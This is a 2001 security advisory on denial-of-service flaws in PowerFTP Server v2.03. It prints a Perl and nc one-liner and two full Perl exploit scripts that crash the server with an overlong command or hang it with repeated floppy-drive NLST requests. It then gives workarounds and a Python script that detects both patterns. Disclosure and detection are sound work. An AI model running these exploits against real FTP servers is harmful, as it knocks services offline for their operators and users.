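PowerFTP Server Denial-of-Service Vulnerability
Published: 2001-11-28
Updated: 2001-11-29
Affected systems:
PowerFTPServer v2.03
Description:
PowerFTP Server is an FTP server for the Windows platform.
The server has several security problems: sending it an overlong command or the "NLST A:/" command can crash the FTP server, so a remote attacker can cause a denial of service.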
<*Source: al3x hernandez (al3xhernandez@ureach.com)
Link: http://archives.neohapsis.com/archives/bugtraq/2001-11/0243.html
*>
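Test method:
WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use it at your own risk!
al3x hernandez (al3xhernandez@ureach.com) provided the following test code: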
# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21
220 Personal FTP Server ready
#
The system crashes and the admin needs to restart the service!
------oOo-------------
Exploit Code DoS PowerFTP_Dos.pl
------oOo-------------
#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server,
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_Dos.pl -s <server>
#
# Example:
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#
use Getopt::Std;
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");
sub usage {die("\nUsage: $0 -s <server>\n\n");}
------oOo-------------
Exploit Code DoS attack floppy remote PowerFTP_floppy.pl
------oOo-------------
#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware
# will still hang the machine. This program attempts to
# exploit this weakness by sending the 'NLST a:/' command to
# the server
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example:
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
#
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
#$NUMBER_TO_SEND = 3000;
$BUFF = 3000;
if ( scalar @ARGV < 4 ) {
print "Usage: $0 <server> <port> <user> <pass>\n";
exit();
}
$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$username = $ARGV[ 2 ];
$password = $ARGV[ 3 ];
print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
PeerPort => int( $port ),
Proto => 'tcp' );
die "$!" unless $sock;
print "done.\n";
read( $sock, $buffer, 1 );
print "Sending username...";
print $sock "USER " . $username . "\n";
read( $sock, $buffer, 1 );
print "done.\n";
print "Sending password...";
print $sock "PASS " . $password . "\n";
read( $sock, $buffer, 1 );
print "done.\n";
print "DoS Attack floppy server...";
for( $i = 0; $i < $BUFF; $i++ ) {
print $sock "NLST a:/\n";
read( $sock, $buffer, 1 );
}
print "done.\n";
close( $sock );
exit();
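Recommendations:
Temporary workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Switch to another, secure FTP server
* Deny untrusted users access to this FTP server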
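While the server has to stay in service, the two request patterns this advisory describes can be flagged in a capture of FTP control-channel commands. The check below is an added example, not part of the original advisory or the vendor's code; the 512-byte length limit, the repeat threshold and the input format (client address plus raw command line) are assumptions.

```python
import re
from collections import Counter

MAX_CMD_LEN = 512        # assumed limit; the advisory's test sends 2048 bytes
NLST_REPEAT_LIMIT = 5    # assumed per-client threshold for floppy listings

# NLST/LIST whose argument starts with a floppy drive letter (a: or b:), any case
FLOPPY_LISTING = re.compile(rb"^(?:NLST|LIST)\s+[ab]:[\\/]?", re.IGNORECASE)


def classify(line: bytes) -> str:
    """Return 'overlong', 'floppy-listing' or 'ok' for one command line."""
    stripped = line.rstrip(b"\r\n")
    if len(stripped) > MAX_CMD_LEN:
        return "overlong"
    if FLOPPY_LISTING.match(stripped):
        return "floppy-listing"
    return "ok"


def scan(events):
    """events: iterable of (client_ip, raw_command_bytes); returns alert tuples."""
    alerts, floppy_hits = [], Counter()
    for client, line in events:
        verdict = classify(line)
        if verdict == "overlong":
            # One overlong line is enough to alert: report its length
            alerts.append((client, "overlong command", len(line.rstrip(b"\r\n"))))
        elif verdict == "floppy-listing":
            floppy_hits[client] += 1
            # Alert once, when the client reaches the threshold
            if floppy_hits[client] == NLST_REPEAT_LIMIT:
                alerts.append((client, "repeated floppy listing", NLST_REPEAT_LIMIT))
    return alerts


# Constructed sample capture (documentation addresses, not real traffic)
SAMPLE = (
    [("192.0.2.10", b"USER temp\r\n"), ("192.0.2.10", b"PASS temp\r\n")]
    + [("192.0.2.10", b"NLST a:/\n")] * 6
    + [("192.0.2.20", b"A" * 2048 + b"\r\n")]
    + [("192.0.2.30", b"NLST pub\r\n")]
)

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```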
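Vendor patch:
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.cooolsoft.com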